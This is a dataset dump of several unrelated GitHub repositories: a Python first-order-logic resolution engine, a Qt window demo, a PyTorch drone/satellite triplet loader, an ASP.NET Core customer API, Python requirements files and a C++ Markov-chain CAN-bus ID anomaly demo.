branch_name stringclasses 149 values | text stringlengths 23 89.3M | directory_id stringlengths 40 40 | languages listlengths 1 19 | num_files int64 1 11.8k | repo_language stringclasses 38 values | repo_name stringlengths 6 114 | revision_id stringlengths 40 40 | snapshot_id stringlengths 40 40 |
|---|---|---|---|---|---|---|---|---|
refs/heads/master | <file_sep>import copy
# import collections.defaultdict
import itertools
# --- Input parsing -------------------------------------------------------
# input.txt layout: <number of queries>, the query literals, <number of KB
# sentences>, then the sentences.  All spaces are stripped so literals are
# compact strings like '~Sibling(John,x)'.
# NOTE(review): this script uses Python 2 print statements throughout.
# NOTE(review): neither file object is ever closed.
inputFileObject = open("input.txt", "r")
outputFileObject = open("output.txt", "w")
operators = ['or', 'not']
queryNum = int(inputFileObject.readline().strip())
queryList = []
for i in range(queryNum):
    query = inputFileObject.readline().strip()
    query = query.replace(" ", "")
    queryList.append(query)
print queryList
knowledgeBaseNum = int(inputFileObject.readline().strip())
kbList = []
for i in range(knowledgeBaseNum):
    sentence = inputFileObject.readline().strip().replace(" ", "")
    kbList.append(sentence)
print kbList
def negate(current_str):
    """Toggle the leading '~' negation on a literal string."""
    if current_str.startswith('~'):
        return current_str[1:]
    return '~' + current_str
def findPredicate(current_str):
    """Return (predicate-name chars, negation flag) for a literal like '~P(x,y)'.

    The name is returned as a list of characters to match the original call
    sites, which compare two results with ==.  flag is 1 when the literal is
    negated, 0 otherwise.

    Fix: the original left `temp1` unbound (NameError) when the literal had
    no '(' — now the whole string is used as the name in that case.
    """
    temp = list(current_str)
    temp1 = temp  # fallback: no '(' found, treat the whole string as the name
    for j in range(len(temp)):
        if temp[j] == '(':
            temp1 = temp[:j]
            break
    if temp1 and temp1[0] == '~':
        return temp1[1:], 1
    return temp1[:], 0
def findArguments(current_predicate):
    """Extract the comma-separated argument list from a literal 'Pred(a,b,c)'."""
    open_paren = current_predicate.find('(')
    if open_paren != -1:
        # keep only what sits between '(' and the trailing ')'
        current_predicate = current_predicate[open_paren + 1:-1]
    return current_predicate.split(',')
def isCapitalAlphabet(c):
    """True when c compares within the 'A'..'Z' range (lexicographic, so a
    multi-char constant such as 'John' also qualifies)."""
    return 'A' <= c <= 'Z'
def isVar(c):
    """True for a single lowercase character (a variable per the spec)."""
    return isinstance(c, str) and len(c) == 1 and c.islower()
def unification(args1, args2):
    """Pairwise-unify two argument lists; return the substitution dict.

    Variable/constant pairs bind variable -> constant; equal constants map
    to themselves; variable/variable pairs bind the second to the first.
    Returns {} when both sides consist entirely of variables.
    """
    substitute = {}
    vars1 = sum(1 for a in args1 if isVar(a))
    vars2 = sum(1 for a in args2 if isVar(a))
    # Both argument lists are all variables: nothing useful to bind.
    if vars1 == vars2 and vars1 == len(args1):
        return substitute
    for left, right in zip(args1, args2):
        if isVar(left) and isCapitalAlphabet(right):
            substitute[left] = right
        elif isVar(right) and isCapitalAlphabet(left):
            substitute[right] = left
        elif isCapitalAlphabet(left) and isCapitalAlphabet(right) and left == right:
            substitute[left] = right
        elif isVar(left) and isVar(right):
            substitute[right] = left
    return substitute
def add_query(str1, str2, each_predicate1, each_predicate2, unified_variables):
    """Build the resolvent clause after resolving two clauses.

    str1/str2 are the '|'-split literal lists of the two parent clauses;
    each_predicate1/each_predicate2 are the complementary literals being
    cancelled.  The surviving literals are re-joined with '|' and every
    bound single-character variable inside '(...)' is replaced using
    unified_variables.  Returns the new clause string; '' means the empty
    clause (a contradiction was derived).
    """
    new_kb_query = ''
    temp_list = str1 + str2
    # Keep every literal except the two that cancel each other.
    for m in temp_list:
        if m != each_predicate1 and m != each_predicate2:
            new_kb_query += m + '|'
    new_kb_query = new_kb_query[:-1]  # drop the trailing '|'
    flag = 0   # 1 while scanning inside an argument list '(...)'
    ans = ''   # accumulates the characters of the current argument
    new_kb_query = list(new_kb_query)
    for i in range(len(new_kb_query)):
        if new_kb_query[i] == '(':
            flag = 1
        elif new_kb_query[i] == ')':
            flag = 0
            # End of the last argument: substitute it if it is a bound
            # variable.  Writing at i-1 only works for single-character
            # variables, which matches the assignment's specification.
            if ans in unified_variables.keys() and isVar(ans):
                new_kb_query[i - 1] = unified_variables[ans]
            ans = ''
        elif new_kb_query[i] == ',':
            if ans in unified_variables.keys() and isVar(ans):
                new_kb_query[i - 1] = unified_variables[ans]
            ans = ''
        elif flag == 1:
            ans += new_kb_query[i]
    new_kb_query = ''.join(new_kb_query)
    return new_kb_query
'''
for each_query in queryList:
query_prove=negate(each_query)
print 'negated query',query_prove
temp_query = query_prove
while(len(copy_kbList)):
copy_kbList = copy.deepcopy(kbList)
copy_kbList.append(temp_query)
for sentence in copy_kbList:
print sentence
split_sentence1 = temp_query.split('|')
split_sentence2 = sentence.split('|')
for each_predicate1,each_predicate2 in itertools.product(split_sentence1,split_sentence2):
predicate1, flag1 = findPredicate(each_predicate1)
predicate2,flag2=findPredicate(each_predicate2)
print predicate1,flag1
print predicate2,flag2
if predicate1==predicate2 and flag1!=flag2:
args1=findArguments(each_predicate1)
args2=findArguments(each_predicate2)
unified_variables=unification(args1,args2)
if len(unified_variables)!=0:
#print unified_variables
new_kb_query=add_query(split_sentence1,split_sentence2,each_predicate1,each_predicate2,unified_variables)
if new_kb_query=='':
print ' #### TRUE #####'
print new_kb_query
temp_query=new_kb_query
copy_kbList.append(new_kb_query)
copy_kbList.remove(sentence)
copy_kbList.remove(temp_query)
print copy_kbList
break
break
break
'''
def call_to_KB(kbList, kbList_index, query_prove):
    """Recursive resolution: try to derive the empty clause from query_prove.

    kbList       -- clause strings (the KB plus the negated query)
    kbList_index -- parallel 0/1 flags marking clauses in use on the current
                    recursion path (prevents re-using the same clause)
    Returns True when an empty resolvent is produced, False on a dead end
    (the clause's in-use flag is reset on backtrack).
    NOTE(review): Python 2 print statements; the whole script targets Python 2.
    """
    temp_query = query_prove
    '''
    if temp_query not in kbList:
        kbList.append(temp_query)
        kbList_index.append(0)
    '''
    for sentence in kbList:
        # Skip clauses already used on this path and the query itself.
        if kbList_index[kbList.index(sentence)] != 1 and temp_query!=sentence:
            print 'Taking sentence', temp_query, sentence
            split_sentence1 = temp_query.split('|')
            split_sentence2 = sentence.split('|')
            # Try every literal pair across the two clauses.
            for each_predicate1, each_predicate2 in itertools.product(split_sentence1, split_sentence2):
                predicate1, flag1 = findPredicate(each_predicate1)
                predicate2, flag2 = findPredicate(each_predicate2)
                # Complementary literals (same predicate, opposite sign) can resolve.
                if predicate1 == predicate2 and flag1 != flag2:
                    '''Call to unification'''
                    args1 = findArguments(each_predicate1)
                    args2 = findArguments(each_predicate2)
                    unified_variables = unification(args1, args2)
                    # Resolve only when every argument pair was unified.
                    if len(unified_variables) == len(args1):
                        new_kb_query = add_query(split_sentence1, split_sentence2, each_predicate1, each_predicate2,
                                                 unified_variables)
                        kbList_index[kbList.index(sentence)] = 1  # mark clause in use
                        if new_kb_query == '':
                            return True  # empty clause: contradiction derived
                        #kbList_index[kbList.index(temp_query)] = 1
                        if call_to_KB(kbList, kbList_index, new_kb_query):
                            return True
                        else:
                            kbList_index[kbList.index(sentence)] = 0  # backtrack
    print 'BackTrack , current temp query', temp_query
    return False
# --- Driver --------------------------------------------------------------
# Negate the first query, seed the working KB with it, then attempt
# resolution starting from every clause until a contradiction is found.
query_prove = negate(queryList[0])
kbList_temp = copy.deepcopy(kbList)
kbList_temp.insert(0,query_prove)
kbList_index = [0] * len(kbList_temp)
kbList_index[kbList_temp.index(query_prove)]=1
#print call_to_KB(kbList_temp, kbList_index, query_prove)
#print kbList_temp,kbList_index
ans_found=0
for query_prove in kbList_temp:
    print 'NOW RECURSION CALL'
    if call_to_KB(kbList_temp, kbList_index, query_prove):
        print True
        ans_found=1
        break
    # Dead end from this start clause: clear its flag and move on.
    kbList_index[kbList_temp.index(query_prove)] = 0
    print kbList_index
if ans_found==0:
    print False
print kbList_temp,kbList_index
<file_sep># Expert_system_Inference_engine
Implemented a protocol for navigating through the rules and data in a knowledge system in order to solve the problem.
Used Backward chaining mode to determine what facts must be asserted so that the goals can be achieved.
Knowledge bases contain only the following defined operators:
NOT X
X OR Y
1. Each query will be a single literal of the form Predicate(Constant) or ~Predicate(Constant).
2. Variables are all single lowercase letters.
3. All predicates (such as Sibling) and constants (such as John) are case-sensitive alphabetical strings that
begin with an uppercase letter.
4. Each predicate takes at least one argument.
You can take a look at homework_3.pdf for a more detailed explanation and examples.
| 0f0a02c311fafc660cae51a3455af2c6d85d7b0b | [
"Markdown",
"Python"
] | 2 | Python | harsh5296/Expert_system_Inference_engine | 5f1efe09f6ffe669853df5d970643c86b1bf46a1 | b5026160d163020c5f4edf3238fadec7ecc8638e |
refs/heads/master | <file_sep>#include "mainwindow.h"
#include "ui_mainwindow.h"
// Main window: owns the secondary WindowMenu and re-shows itself when the
// menu emits firstWindow().
MainWindow::MainWindow(QWidget *parent)
    : QMainWindow(parent)
    , ui(new Ui::MainWindow)
{
    ui->setupUi(this);
    // NOTE(review): sWindow is created without a QObject parent, so Qt's
    // ownership tree will not delete it automatically.
    sWindow= new WindowMenu ();
    connect(sWindow, &WindowMenu::firstWindow, this, &MainWindow::show);
}
MainWindow::~MainWindow()
{
    // Fix: sWindow is created without a QObject parent in the constructor,
    // so it is not freed by Qt's parent-child ownership — delete it here
    // to avoid leaking the menu window.
    delete sWindow;
    delete ui;
}
// Button slot: switch from the main window to the menu window.
void MainWindow::on_pushButton_clicked()
{
    sWindow -> show ();
    this -> close ();
}
<file_sep>#ifndef WINDOWMENU_H
#define WINDOWMENU_H
#include <QWidget>
QT_BEGIN_NAMESPACE
namespace Ui { class WindowMenu; }
QT_END_NAMESPACE
// Secondary menu window.  Emits firstWindow() when its button is pressed so
// the owning MainWindow can show itself again.
class WindowMenu : public QWidget
{
    Q_OBJECT
signals:
    void firstWindow();   // fired just before this window closes itself
public:
    WindowMenu(QWidget *parent = nullptr);
    ~WindowMenu();
private:
    Ui::WindowMenu *ui;   // Designer-generated UI
private slots:
    void on_pushButton_clicked();   // close self and notify MainWindow
};
#endif // WINDOWMENU_H
<file_sep>#include "windowmenu.h"
#include "ui_windowmenu.h"
// Construct the menu window from its Designer form.
WindowMenu::WindowMenu(QWidget *parent):
    QWidget(parent),
    ui(new Ui::WindowMenu)
{
    ui->setupUi(this);
}
WindowMenu::~WindowMenu()
{
    delete ui;
}
// Button slot: hide this window and signal the main window to reappear.
void WindowMenu::on_pushButton_clicked()
{
    this->close();
    emit firstWindow();
}
| 67755f072d0c95c18c74541d2d52f542e58a65c1 | [
"C++"
] | 3 | C++ | Dima98772/OurProject_pr4 | 6129b33b7519a9054a030aa80e1d8f62d8cd85d9 | 5f5d5d349b61ba64fab26e91766e46e8fa248651 |
refs/heads/master | <file_sep>from torchvision import datasets
import os
import numpy as np
import random
import torch
class TripletFolder(datasets.ImageFolder):
    """ImageFolder over <root>/satellite that, for each satellite image, also
    returns 4 drone-view images of the same location id.

    A flat index of drone images is built once at construction from
    <root>/drone/<id>/<file>.
    """
    def __init__(self, root, transform):
        super(TripletFolder, self).__init__(root + '/satellite', transform)
        # record the drone information
        drone_path = []
        drone_id = []
        drone_root = root + '/drone/'
        for folder_name in os.listdir(drone_root):
            folder_root = drone_root + folder_name
            if not os.path.isdir(folder_root):
                continue
            for file_name in os.listdir(folder_root):
                drone_path.append(folder_root + '/' + file_name)
                drone_id.append(int(folder_name))
        self.drone_path = drone_path          # flat list of drone image paths
        self.drone_id = np.asarray(drone_id)  # parallel array of location ids
    def _get_pos_sample(self, target, index):
        """Return 4 drone image paths sharing location id `target`.

        Samples without replacement while possible; wraps around
        (t = i % len) when a location has fewer than 4 drone images.
        `index` is accepted but unused.
        """
        pos_index = np.argwhere(self.drone_id == target)
        rand = np.random.permutation(len(pos_index))
        result_path = []
        for i in range(4):
            t = i%len(rand)
            tmp_index = pos_index[rand[t]][0]
            result_path.append(self.drone_path[tmp_index])
        return result_path
    def _get_neg_sample(self, target):
        """Return one drone image path whose location id differs from target."""
        neg_index = np.argwhere(self.drone_id != target)
        neg_index = neg_index.flatten()
        rand = random.randint(0,len(neg_index)-1)
        return self.drone_path[neg_index[rand]]
    def __getitem__(self, index):
        """Return (satellite_img, target, stacked 4 positive drone imgs,
        positive target).  Positives share the satellite image's folder id.
        """
        path, target = self.samples[index]
        # The folder name is the true location id; `target` is ImageFolder's
        # remapped class index, which may differ from the id itself.
        original_target = int(os.path.basename(os.path.dirname(path)))
        # pos_path, neg_path
        pos_path = self._get_pos_sample(original_target, index)
        sample = self.loader(path)
        pos0 = self.loader(pos_path[0])
        pos1 = self.loader(pos_path[1])
        pos2 = self.loader(pos_path[2])
        pos3 = self.loader(pos_path[3])
        if self.transform is not None:
            sample = self.transform(sample)
            pos0 = self.transform(pos0)
            pos1 = self.transform(pos1)
            pos2 = self.transform(pos2)
            pos3 = self.transform(pos3)
        if self.target_transform is not None:
            target = self.target_transform(target)
        c,h,w = pos0.shape
        # Stack the four positives into one (4, C, H, W) tensor.
        pos = torch.cat((pos0.view(1,c,h,w), pos1.view(1,c,h,w), pos2.view(1,c,h,w), pos3.view(1,c,h,w)), 0)
        pos_target = target
        return sample, target, pos, pos_target
| 2593f6271f0d673e99cc5b698b6d5c9351bae2cb | [
"Python"
] | 1 | Python | maomingyang/University1652-triplet-loss | a3e2d26b4cbacfe4b46ef3aff16aa096bca34684 | 1203119c6a5b6cb7adb90b1f0633a409114d1bfd |
refs/heads/master | <file_sep># ICS4U-Unit-1-01-Python
# <NAME>
Python test from IDEs on windows
<file_sep>#---------------------------------------#
#-- Created by: <NAME> --#
#-- Created on: Feb 8 2019 --#
#-- Created for: Unit 1-01 --#
#-- Course Code: ICS4U --#
#-- Teacher Name: <NAME> --#
#---------------------------------------#
print("Hello, World!") | 7a350da36bc655b729907d807b3ebe87ead4d85c | [
"Markdown",
"Python"
] | 2 | Markdown | AlirezaTeimoori/ICS4U-Unit-1-01-Python | 1d9feb328b5ef4c9f40df63b2ff0cedff7e75cd6 | 162d63d4b22056f47cc5b989b70f0b0001181dfa |
refs/heads/master | <file_sep>google-api-python-client==1.6.4
google-auth==1.1.1
google-auth-httplib2==0.0.2
requests==2.18.4
<file_sep>google-api-python-client==1.6.4
google-auth==1.1.1
google-auth-httplib2==0.0.2
google-cloud==0.27.0
<file_sep>Flask==0.12.2
google-api-python-client==1.6.4
google-auth==1.1.1
google-auth-httplib2==0.0.2
google-cloud-datastore==1.3.0
gunicorn==19.7.1
<file_sep>google-cloud-language==0.29.0
<file_sep>google-cloud-language==0.29.0
numpy==1.13.1
<file_sep>grpcio==1.6.0
google-auth==1.1.1
<file_sep>google-endpoints==2.3.1
google-endpoints-api-management==1.2.1
<file_sep>google-cloud-firestore==0.27.0
<file_sep>"# python_django_restapi"
<file_sep>from django.db import models
from restapi.models.base import BaseModel
from restapi.models.base import BaseReadonlyModelMixin
from restapi.models.choices import PUBLISHER_STATUS_APPROVED
from restapi.models.choices import PUBLISHER_STATUS_CHOICES
from restapi.models.managers import BaseManager
class PublisherManager(BaseManager):
pass
class Publisher(BaseReadonlyModelMixin, BaseModel):
publisher_id = models.AutoField(primary_key=True)
publisher = models.CharField(max_length=255)
status = models.CharField(max_length=10, choices=PUBLISHER_STATUS_CHOICES, default=PUBLISHER_STATUS_APPROVED)
objects = PublisherManager()
objects_raw = models.Manager()
def __unicode__(self):
return self.publisher
class Meta:
# managed=False
db_table = 'publisher'
app_label = 'restapi'
<file_sep># Cloud IoT Core Python HTTP example
This sample app publishes data to Cloud Pub/Sub using the HTTP bridge provided
as part of Google Cloud IoT Core. For detailed running instructions see the
[HTTP code samples
guide](https://cloud.google.com/iot/docs/protocol_bridge_guide).
# Setup
1. Use virtualenv to create a local Python environment.
```
virtualenv env && source env/bin/activate
```
1. Install the dependencies
```
pip install -r requirements.txt
```
# Running the Sample
The following snippet summarizes usage:
```
cloudiot_http_example.py [-h]
--project_id PROJECT_ID
--registry_id REGISTRY_ID
--device_id DEVICE_ID
--private_key_file PRIVATE_KEY_FILE
--algorithm {RS256,ES256}
--message_type={event,state}
[--cloud_region CLOUD_REGION]
[--ca_certs CA_CERTS]
[--num_messages NUM_MESSAGES]
```
For example, if your project ID is `blue-jet-123`, the following example shows
how you would execute using the configuration from the HTTP code samples guide:
```
python cloudiot_http_example.py \
--registry_id=my-registry \
--project_id=blue-jet-123 \
--device_id=my-python-device \
--message_type=event \
--algorithm=RS256 \
--private_key_file=../rsa_private.pem
```
<file_sep>google-api-python-client==1.6.4
google-auth==1.1.1
google-auth-httplib2==0.0.2
<file_sep>cryptography==2.0.3
pyjwt==1.5.3
requests==2.18.4
<file_sep># Parsing
pyparsing==2.2.0
pyyaml==3.11
# Deployment
setuptools==26.1.1
twine==1.8.1
# Documentation
sphinx_bootstrap_theme>=0.4.6<file_sep>google-api-python-client==1.6.4
google-auth-httplib2==0.0.2
google-auth==1.1.1
<file_sep>google-auth==1.1.1
google-auth-oauthlib==0.1.1
google-auth-httplib2==0.0.2
google-api-python-client==1.6.4
flask==0.12.2
requests==2.18.4
<file_sep>google-cloud-videointelligence==0.27.2
| f0883020dfb0286fed39941e1c994a6e0f1b68b1 | [
"Markdown",
"Python",
"Text"
] | 17 | Text | moonking211/python | 729d747877616b5c4a2d377d2c2182bb16248834 | f1ddc5ea045a1cb33dacd4789901eaf969500e94 |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
using Microsoft.EntityFrameworkCore;
using TestApi.Data;
using TestApi.Models;
using TestApi.Services;
namespace TestApi.Controllers
{
[Route("api/[controller]")]
[ApiController]
public class ValuesController : Controller
{
private AppDbContext _context;
public ValuesController(AppDbContext dbContext)
{
_context = dbContext;
}
// GET api/values
[HttpGet]
public IActionResult Get()
{
return Json(_context.Customers.Where(c => c.Id > 0));
}
// GET Products
[HttpGet]
[Route("Get_Product")]
public IActionResult Get_Product()
{
return Json(_context.Products.Where(p => p.Id > 0));
}
// GET api/values/5
[HttpGet("{id}")]
public async Task<IActionResult> Get(int id)
{
return Json(await _context.Customers.FindAsync(id));
}
// POST api/values
[HttpPost]
public async Task<IActionResult> Post(Customer customer)
{
if (!ModelState.IsValid)
{
return Json(customer);
}
// var pro = _context.Products.Where(c => c.Id == 1).Include(p => p.Customer);
// Task Paraller Library (TPL) with async / await
await _context.Customers.AddAsync(customer);
_context.SaveChanges();
return NoContent();
}
// POST api/values
[HttpPost]
[Route("Post_Product")]
public async Task<IActionResult> Post_Product(Product product)
{
if (!ModelState.IsValid)
{
return Json(product);
}
// var pro = _context.Products.Where(c => c.Id == 1).Include(p => p.Customer);
// Task Paraller Library (TPL) with async / await
await _context.Products.AddAsync(product);
await _context.SaveChangesAsync();
return NoContent();
}
// PUT api/values/5
[HttpPatch("{id}")]
public void Patch(Customer customer)
{
_context.Attach(customer);
_context.Entry(customer).State = EntityState.Modified;
_context.SaveChanges();
}
// DELETE api/values/5
[HttpDelete("{id}")]
public void Delete(int id)
{
var customer = _context.Customers.Find(id);
_context.Customers.Remove(customer);
_context.SaveChanges();
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using TestApi.Models;
namespace TestApi.Services
{
public class CustomerRepository
{
public List<Customer> Customers { get; set; } = new List<Customer>
{
new Customer
{
Id = 1,
Name = "Meet",
Age = 21
},
new Customer
{
Id = 2,
Name = "Heet",
Age = 25
}
};
public List<Product> Products { get; set; } = new List<Product> { };
public IEnumerable<Customer> Get()
{
return Customers;
}
public IEnumerable<Product> Get_Product()
{
return Products;
}
public Customer Get(int id)
{
return Customers.Find(c => c.Id == id);
}
public void Add(Customer customer)
{
Customers.Add(customer);
}
public void Delete(int id)
{
var customer = Customers.Find(c => c.Id == id);
Customers.Remove(customer);
}
}
}
| 81e96ecb2de0a4cec0630ffd1eb3f7b3d84a3083 | [
"C#"
] | 2 | C# | meetjanani/TestApi | d4079f34ef2129a26cf0e90275a0e5e693ca4d05 | 8e0843d2187d5ed394645b52ca9586af1c2d5971 |
refs/heads/master | <repo_name>ospiridonovn/unike<file_sep>/js/hide.js
// Toggle visibility of a collapsible text block.
//   type - id of the div to show/hide
//   b1   - id of the "open" button (visible while the text is hidden)
//   b2   - id of the "close" button (visible while the text is shown)
function showHiddenText(type, b1, b2){
    // Fix: the original assigned to undeclared identifiers, creating
    // accidental globals; declare them locally instead.
    var currentDiv = document.getElementById(type);
    var openbutton = document.getElementById(b1);
    var closebutton = document.getElementById(b2);
    var isOpen = currentDiv.style.display == 'block';
    currentDiv.style.display = isOpen ? 'none' : 'block';
    openbutton.style.display = isOpen ? 'block' : 'none';
    closebutton.style.display = isOpen ? 'none' : 'block';
}
"JavaScript"
] | 1 | JavaScript | ospiridonovn/unike | 480a580eb24bef98208ade63fd727fd4b43aa025 | 2644bd9187c71fc43a4762913f109d097c0e0b99 |
refs/heads/main | <file_sep>#include <iostream>
#include "MarkovChain.h"
//=========================================================================================
// An example of 3 nodes, 0x10 and 0x12 transmit each 10ms, and 0x14 transmits every 20ms.|
//=========================================================================================
// 0x10 ---'a' === |
// 0x12 ---'b' |- " Mapping of IDs in characters " |
// 0x14 ---'c' === |
//=========================================================================================
// Afterwards, in the window of 40ms, all possible transmission sequences are created|
// in the defined trainingSets, and given in the Markov Chain for evaluation of the |
// probabilities each time. |
//=========================================================================================
using namespace std;
MarkovChain chain;
// Fill a 6-char buffer with the five sequence characters plus terminator.
void create( char * pos, char a, char b, char c, char d, char e, char zero)
{
    const char values[6] = { a, b, c, d, e, zero };
    for (int i = 0; i < 6; ++i)
        pos[i] = values[i];
}
// Map a sequence character back to its CAN bus ID.
// Fix: the original had no default and could fall off the end of a
// value-returning function (undefined behaviour); unknown characters
// now return -1.
int map(char a)
{
    switch(a) {
    case 'a':
        return 10;
    case 'b':
        return 12;
    case 'c':
        return 14;
    default:
        return -1;
    }
}
// Map a CAN ID back to its sequence character; 'x' flags an unknown ID.
char revmap(int a)
{
    if (a == 10) return 'a';
    if (a == 12) return 'b';
    if (a == 14) return 'c';
    return 'x'; // could be a sign for alert.
}
// 1 when id belongs to the known node set {10, 12, 14}, else 0.
int valid( int id)
{
    return (id == 10 || id == 12 || id == 14) ? 1 : 0;
}
// Map a valid ID (10/12/14) to index 0-2.
// Fix: the original relied on the "only called with a valid ID" comment and
// could fall off the end of a value-returning function (undefined
// behaviour); any other value now returns -1 defensively.
int IDtoIndex(int id)
{
    switch(id) {
    case 10:
        return 0;
    case 12:
        return 1;
    case 14:
        return 2;
    default:
        return -1;
    }
}
// Interactive demo: train the Markov chain on all valid 5-message windows,
// then score user-entered IDs, alerting on invalid or zero-probability ones.
int main(void)
{
    char **trainingSet;
    int possibilityArray[3];    // 1 when an ID's predicted next-show probability was 0
    int IDS[3] = { 10, 12, 14};
    trainingSet = (char **) malloc(12*sizeof(char *));
    for(int i = 0; i < 3; i++)
        possibilityArray[i] = 0;
    cout << "Possibilities array initialized" << endl;
    for(int i = 0; i < 12; i++)
        trainingSet[i] = (char *) malloc(6*sizeof(char));
    // trainingSets creation: every valid ordering of the 40ms window
    // ('a' and 'b' twice each, 'c' once -- see the header comment).
    create(trainingSet[0], 'a', 'b', 'a', 'b', 'c', '\0');
    create(trainingSet[1], 'a', 'b', 'a', 'c', 'b', '\0');
    create(trainingSet[2], 'a', 'b', 'b', 'a', 'c', '\0');
    create(trainingSet[3], 'a', 'b', 'b', 'c', 'a', '\0');
    create(trainingSet[4], 'a', 'b', 'c', 'a', 'b', '\0');
    create(trainingSet[5], 'a', 'b', 'c', 'b', 'a', '\0');
    create(trainingSet[6], 'b', 'a', 'a', 'b', 'c', '\0');
    create(trainingSet[7], 'b', 'a', 'a', 'c', 'b', '\0');
    create(trainingSet[8], 'b', 'a', 'b', 'a', 'c', '\0');
    create(trainingSet[9], 'b', 'a', 'b', 'c', 'a', '\0');
    create(trainingSet[10], 'b', 'a', 'c', 'a', 'b', '\0');
    create(trainingSet[11], 'b', 'a', 'c', 'b', 'a', '\0');
    cout << "Training Set " << endl;
    //printing the sequences.
    for(int i = 0; i < 12; i++) {
        cout << "Seq" << i << " " << endl;
        cout << map(trainingSet[i][0]) << " " ;
        cout << map(trainingSet[i][1]) << " " ;
        cout << map(trainingSet[i][2]) << " " ;
        cout << map(trainingSet[i][3]) << " " ;
        cout << map(trainingSet[i][4]) << " " << endl;
    }
    // to get probability results every 5 messages on the bus.
    int window_index = 0;
    int window = 5;
    char trace[5]; // used to hold IDs within' a WINDOW
    char elements[] = { 'a', 'b', 'c'};
    int test = 99;
    int isValid;        // NOTE(review): unused
    int change_flag;
    cout << "Enter valid ID (10, 12, 14) to see\nthe probability of the next shown ID on the bus.\nEnter 0 to exit" << endl;
    while(test != 0) {
        change_flag = 0;
        cout << "Enter ID: " << endl;
        cin >> test;
        // Record the (possibly invalid) ID in the window trace first.
        trace[window_index++] = revmap(test);
        if( valid(test) ) {
            // An ID arriving while its predicted probability was 0 is suspicious.
            if( possibilityArray[IDtoIndex(test)] ) {
                cout << "\t\tALERT ::: ID had show-up possibility 0." << endl;
                possibilityArray[IDtoIndex(test)] = 0;
            }
            double *probs = chain.getNextTransitions(revmap(test), elements, 3, trainingSet, 12);
            cout << "Probability of IDs appearing next: " << endl;
            for(int i = 0; i < 3; i++) {
                cout << map(elements[i]) << " : " << probs[i] << endl;
                // remember this in next reception, to raise ALERT because
                // probability will be zero to see this specific ID.
                if(probs[i] == 0.0) {
                    possibilityArray[i] = 1;
                    change_flag++;
                }
            }
            // NOTE(review): probs is malloc'd by getNextTransitions and is
            // never freed here -- leaks one array per received message.
        } else {
            cout << "\t\tALERT ::: invalid ID." << endl;
        }
        if(!change_flag)
            for(int i = 0; i < 3; i++)
                possibilityArray[i] = 0;
        // Every `window` messages, score the whole recent trace.
        if(window_index == window) {
            double res;
            cout << "Getting recent window Sequence probability" << endl;
            res = chain.getSequenceProbability(trace, window, elements, 3, trainingSet, 12);
            cout << "Probability of recent Window: " << res << endl;
            window_index = 0;
        }
    }
    return (0);
}
<file_sep>all:
g++ -c MarkovChain.cpp
g++ -o a.out main.cpp MarkovChain.o
clean:
rm MarkovChain.o a.out
<file_sep>/*
MarkovChain.h - Library for using Markov Chains in Arduino
*/
#ifndef MarkovChain_h
#define MarkovChain_h
// First-order Markov chain estimated from example sequences of
// single-character states.  All heap-allocated results are owned and
// freed by the caller.
class MarkovChain
{
public:
    // --- building blocks (used internally by the two entry points) ---
    int* getFirstStates(char* elements, int numOfElements, char** sequences, int rows);
    int counterTransitionsInSequence(char expectedFrom, char expectedTo, char sequence [], int numOfElements);
    int countElementsInSequence(char * sequence);
    int** createTransitionMatrix(char elements [], int numOfElements, char ** sequences, int numSequences);
    int* countRowsTotals(int** transitionMatrix, int numOfElements);
    double** createTransitionProbabilityMatrix(int* rowsTotals, int** transitionMatrix, int numOfElements);
    double * calculateFirstStatesProbabilities (char* elements, int numOfElements, char** sequences, int numOfSecuences);
    //******************************************************************************************
    //******* Only the following functions are needed to be called to use Markov Chains ********
    //******************************************************************************************
    // Next-state probability row for `element`, in the order of `elements`.
    double* getNextTransitions(char element, char* elements, int numOfElements, char ** sequences, int numSequences );
    // Occurrence probability of a whole sequence.
    double getSequenceProbability(char* sequence, int seqElementsNum, char* elements, int numOfElements, char ** sequences, int numSequences);
};
#endif
<file_sep>/*
MarkovChain.cpp - Library for using Markov Chains in Arduino.
*/
#include "MarkovChain.h"
#include <stdlib.h>
// Count, for each element, how many training sequences start with it.
// Result is in `elements` order; the caller owns the malloc'd array.
int* MarkovChain::getFirstStates(char* elements, int numOfElements, char** sequences, int rows) {
    int* firstStates = (int *)malloc(numOfElements*sizeof(int));
    for(int iElement = 0; iElement < numOfElements; iElement++) {
        int count = 0;
        char element = elements[iElement];
        for(int iSequence = 0; iSequence < rows; iSequence++) {
            char firstElement = sequences[iSequence][0];
            if (firstElement == element) {
                count++;
            }
        }
        firstStates[iElement] = count;
    }
    return firstStates;
}
// Count occurrences of the transition expectedFrom -> expectedTo inside one
// sequence of numOfElements characters.
int MarkovChain::counterTransitionsInSequence(char expectedFrom, char expectedTo, char sequence [], int numOfElements) {
    int count = 0;
    // Fix: there are numOfElements-1 adjacent pairs; the original iterated
    // one step further and compared the last character against the '\0'
    // terminator (harmless for NUL-terminated input but out-of-bounds for
    // any non-terminated buffer).
    for (int i = 0; i + 1 < numOfElements; i++) {
        char actualFrom = sequence[i];
        char actualTo = sequence[i + 1];
        if((actualFrom == expectedFrom) && (actualTo == expectedTo))
            count++;
    }
    return count;
}
// Length of a NUL-terminated character sequence (strlen equivalent).
int MarkovChain::countElementsInSequence(char * sequence) {
    int length = 0;
    while (sequence[length] != '\0')
        length++;
    return length;
}
// Build the numOfElements x numOfElements transition-count matrix:
// entry [from][to] = occurrences of elements[from] -> elements[to] summed
// over all training sequences.  Caller frees each row, then the row array.
int** MarkovChain::createTransitionMatrix(char elements [], int numOfElements, char ** sequences, int numSequences) {
    //The number of rows and columns of the transition matrix always equals
    //to the number of distinc elements
    int** matrix;
    matrix = (int **) malloc(numOfElements*sizeof(int *));
    for(int i = 0; i < numOfElements; i++)
        matrix[i] = (int *) malloc(numOfElements*sizeof(int));
    int row = 0;
    int col = 0;
    int count = 0;
    for(int iFrom = 0; iFrom < numOfElements; iFrom++) {
        for (int iTo = 0; iTo < numOfElements; iTo++) {
            // Accumulate this (from, to) pair's count over every sequence.
            for(int iSequences = 0; iSequences < numSequences; iSequences++) {
                char from = elements[iFrom];
                char to = elements[iTo];
                char* sequence = sequences[iSequences];
                int num = countElementsInSequence(sequence);
                count = count + counterTransitionsInSequence(from, to, sequence,num);
            }
            matrix[row][col] = count;
            count = 0;
            col++;
        }
        row++;
        col = 0;
    }
    return matrix;
